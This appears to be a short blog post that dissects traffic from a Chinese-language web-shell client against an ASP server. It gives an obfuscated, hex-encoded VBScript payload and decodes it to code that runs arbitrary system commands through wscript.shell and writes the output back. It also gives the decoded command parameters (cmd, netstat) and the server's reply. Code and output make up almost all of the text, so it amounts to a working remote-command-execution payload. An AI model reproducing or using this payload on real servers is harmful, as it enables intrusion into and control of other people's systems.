http://blog.csdn.net/webxscan 神龙
命令行
webxscan=Eval ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute
%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci
%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd
(""""53657420583D4372656174654F626A6563742822777363726970742E7368656C6C22292E657865632822222222266264285265717565737428227A3122292926222222202F6320222222266264285265717565737428227A32222929
2622222222293A496620457272205468656E3A533D225B4572725D2022264572722E4465736372697074696F6E3A4572722E436C6561723A456C73653A4F3D582E5374644F75742E52656164416C6C28293A453D582E5374644572722E526
56164416C6C28293A533D4F26453A456E642049663A526573706F6E73652E7772697465285329"""")):Response.Write(""""|<-""""):Response.End"")")
&z1=636D64&z2=6364202F642022433A5C446F63756D656E747320616E642053657474696E67735C615CD7C0C3E65C7777775C2E5C22266E657473746174202D616E207C2066696E64202245535441424C495348454422266563686F205B5
35D266364266563686F205B455D
&z1=cmd
&z2=cd /d "C:\Documents and Settings\a\×ÀÃæ\www\.\"&netstat -an | find "ESTABLISHED"&echo [S]&cd&echo [E]
Set X=CreateObject("wscript.shell").exec(""""&bd(Request("z1"))&""" /c """&bd(Request("z2"))&"""")
If Err Then
S="[Err] "&Err.Description
Err.Clear
Else
O=X.StdOut.ReadAll()
E=X.StdErr.ReadAll()
S=O&E
End If
Response.write(S)
->| TCP 127.0.0.1:80 127.0.0.1:1233 ESTABLISHED
TCP 127.0.0.1:1026 127.0.0.1:1027 ESTABLISHED
TCP 127.0.0.1:1027 127.0.0.1:1026 ESTABLISHED
TCP 127.0.0.1:1110 127.0.0.1:1111 ESTABLISHED
TCP 127.0.0.1:1111 127.0.0.1:1110 ESTABLISHED
TCP 127.0.0.1:1233 127.0.0.1:80 ESTABLISHED
[S]
C:\Documents and Settings\a\桌面\www
[E]
|<-